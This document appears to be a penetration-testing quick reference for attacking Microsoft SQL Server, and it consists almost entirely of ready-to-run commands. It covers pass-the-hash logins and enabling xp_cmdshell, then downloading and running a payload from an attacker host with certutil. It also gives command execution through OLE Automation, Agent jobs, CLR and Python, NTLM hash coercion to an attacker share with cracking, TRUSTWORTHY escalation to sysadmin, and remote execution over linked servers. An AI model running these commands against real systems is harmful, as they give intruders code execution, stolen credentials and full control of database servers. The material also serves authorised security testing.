Use this as a quick reference for MSSQL enumeration, exploitation, privilege escalation, and lateral movement.
Connect
mssqlclient.py user:Passw0rd!@10.10.10.5 -port 1433
mssqlclient.py LAB/user:Passw0rd!@10.10.10.5 -windows-auth
mssqlclient.py LAB/user@10.10.10.5 -windows-auth -hashes :8846F7EAEE8FB117AD06BDD830B7586C
KRB5CCNAME=/tmp/cc mssqlclient.py LAB/user@10.10.10.5 -k -no-pass
sqlcmd -S tcp:10.10.10.5,1433 -U user -P pass
sqlcmd -S 10.10.10.5 -E
sqlcmd -S 10.10.10.5 -U user -P pass -N -C
Identity
SELECT SYSTEM_USER;
SELECT USER_NAME();
SELECT SYSTEM_USER, SUSER_SNAME() AS login, CURRENT_USER AS db_user;
SELECT ORIGINAL_LOGIN() AS original_login, HOST_NAME() AS host_name;
SELECT IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
SELECT net_transport, encrypt_option, auth_scheme FROM sys.dm_exec_connections WHERE session_id = @@SPID;
Server And Config
SELECT @@VERSION;
SELECT @@SERVERNAME;
SELECT SERVERPROPERTY('InstanceName'), SERVERPROPERTY('MachineName'), SERVERPROPERTY('IsClustered');
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('Ad Hoc Distributed Queries','xp_cmdshell','Ole Automation Procedures','clr enabled','clr strict security','external scripts enabled','cross db ownership chaining','remote access')
ORDER BY name;
Databases And Data
SELECT name, state_desc, recovery_model_desc FROM sys.databases ORDER BY name;
USE DB;
SELECT table_name FROM information_schema.tables;
SELECT column_name FROM information_schema.columns WHERE table_name='TABLE';
SELECT TOP 10 * FROM dbo.users;
Non-empty tables:
SELECT s.name AS SchemaName, t.name AS TableName, SUM(p.rows) AS Rows
FROM sys.tables t
JOIN sys.schemas s ON t.schema_id = s.schema_id
JOIN sys.partitions p ON t.object_id = p.object_id
WHERE p.index_id IN (0, 1)
GROUP BY s.name, t.name
ORDER BY Rows DESC;
Roles And Impersonation
EXEC sp_helpsrvrolemember;
SELECT r.name AS role, m.name AS member
FROM sys.server_principals r
JOIN sys.server_role_members rm ON r.principal_id=rm.role_principal_id
JOIN sys.server_principals m ON rm.member_principal_id=m.principal_id
WHERE r.name='sysadmin';
SELECT DISTINCT b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b ON a.grantor_principal_id=b.principal_id
WHERE a.permission_name='IMPERSONATE';
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER, IS_SRVROLEMEMBER('sysadmin');
REVERT;
xp_cmdshell
SELECT name,value_in_use FROM sys.configurations WHERE name='xp_cmdshell';
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'ipconfig /all';
Stage payload:
EXEC xp_cmdshell 'certutil -urlcache -split -f http://ATTACKER/p.exe C:\Windows\Temp\p.exe';
EXEC xp_cmdshell 'C:\Windows\Temp\p.exe';
OLE Automation
SELECT name,value_in_use FROM sys.configurations WHERE name='Ole Automation Procedures';
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;
DECLARE @sh INT, @ret INT;
EXEC sp_OACreate 'WScript.Shell', @sh OUT;
EXEC sp_OAMethod @sh, 'Run', @ret OUT, 'cmd.exe /c whoami > C:\ole.txt', 0, TRUE;
SQL Agent Job RCE
EXEC msdb.dbo.sp_add_job @job_name='poc_job';
EXEC msdb.dbo.sp_add_jobstep @job_name='poc_job', @step_name='poc', @subsystem='CMDEXEC', @command='cmd /c whoami > C:\agent.txt';
EXEC msdb.dbo.sp_add_jobserver @job_name='poc_job';
EXEC msdb.dbo.sp_start_job @job_name='poc_job';
EXEC msdb.dbo.sp_delete_job @job_name='poc_job';
CLR And External Scripts
SELECT name,value_in_use FROM sys.configurations WHERE name='clr enabled';
CREATE ASSEMBLY myexec FROM 'C:\CLRExec.dll' WITH PERMISSION_SET=UNSAFE;
CREATE PROCEDURE sp_cmd @cmd NVARCHAR(MAX) AS EXTERNAL NAME myexec.[CLRExec].RunCmd;
EXEC sp_cmd 'whoami';
DROP PROCEDURE IF EXISTS dbo.sp_cmd;
DROP ASSEMBLY IF EXISTS myexec;
SELECT name,value_in_use FROM sys.configurations WHERE name='external scripts enabled';
EXEC sp_execute_external_script @language=N'Python', @script=N'import os;print(os.popen("whoami").read())';
File, Registry, UNC Coercion
EXEC xp_dirtree 'C:\', 1, 1;
EXEC xp_fileexist 'C:\Windows\System32\drivers\etc\hosts';
SELECT * FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS x;
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion','ProductName';
EXEC xp_logininfo 'BUILTIN\\Administrators','members';
Responder:
sudo responder -I tun0 -v
Coerce:
EXEC xp_dirtree '\\ATTACKER\\share\\ping';
EXEC xp_subdirs '\\ATTACKER\\share\\ping';
EXEC xp_fileexist '\\ATTACKER\\share\\ping';
Crack:
hashcat -m 5600 hashes.txt rockyou.txt
TRUSTWORTHY Escalation
SELECT a.name AS database_name, b.name AS owner, is_trustworthy_on
FROM sys.databases a
JOIN sys.server_principals b ON a.owner_sid=b.sid;
USE DB_GOES_HERE;
GO
CREATE PROCEDURE dbo.make_sysadmin
WITH EXECUTE AS OWNER
AS
BEGIN
EXEC master..sp_addsrvrolemember 'CONTROLLED_USER', 'sysadmin';
END;
GO
EXEC dbo.make_sysadmin;
GO
Verify:
SELECT IS_SRVROLEMEMBER('sysadmin');
Linked Servers
EXEC sp_linkedservers;
SELECT name, product, provider, data_source, is_rpc_out_enabled FROM sys.servers;
EXEC ('SELECT @@SERVERNAME, SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')') AT [LINKNAME];
EXEC ('EXEC xp_cmdshell ''whoami''') AT [LINKNAME];
Enable remote xp_cmdshell:
EXEC ('EXEC sp_configure ''show advanced options'',1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'',1; RECONFIGURE; EXEC xp_cmdshell ''whoami'';') AT [LINKNAME];
Cleanup
EXEC msdb.dbo.sp_delete_job @job_name='poc_job';
DROP PROCEDURE IF EXISTS dbo.sp_cmd;
DROP ASSEMBLY IF EXISTS myexec;
DROP PROCEDURE IF EXISTS dbo.make_sysadmin;
REVERT;